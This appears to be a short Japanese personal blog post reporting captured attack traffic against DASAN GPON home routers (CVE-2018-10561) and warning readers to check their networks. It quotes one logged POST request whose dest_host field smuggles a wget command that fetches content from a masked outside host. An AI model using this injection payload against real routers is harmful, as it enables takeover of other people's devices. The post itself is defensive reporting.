とりあえずブログ

SEとして働く会社員の雑多なブログ

DASAN Network Solutionsのホームルーターを狙った攻撃(CVE-2018-10561)をキャッチ

5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。

具体的なアクセスは下記のようなものです。

POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 119
Content-Type: text/plain
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://YYY.YYY.YYY.YYY/gpon.php?port=80&ipv=0

/GponForm/diag_Form?images/に対し、POSTリクエストを投げていて、何やらwgetコマンドでどこかのサーバから何かを取得するような動きになっています。

これは、韓国のDASAN Networksが販売しているホームルーター脆弱性(CVE-2018-10561)を狙った攻撃で、すでにExploitコードが公開されています。

DASAN

下記のサイトでは実際にサンプルでExploitコードを実行し、任意のコマンドを実行している動画を閲覧することができます。

www.vpnmentor.com

www.youtube.com

上記の動画でも紹介されていますが、少なくとも100万以上のGPONホームルーターが世界中で稼働していることが判明しておりますので、ご自身のネットワークでGPON製のものがないかご確認をお願いします。

とはいっても、僕は初めてGPONという会社を聞きましたので、そこまで日本では有名じゃないのかもしれません。 (逆にぼくがネットワークに疎いだけなのかもしれませんが。。。)

IoTが流行している世の中で、ネットワークに接続される機器が攻撃対象になってしまうのは、仕方がないのですが、怖いですね。。。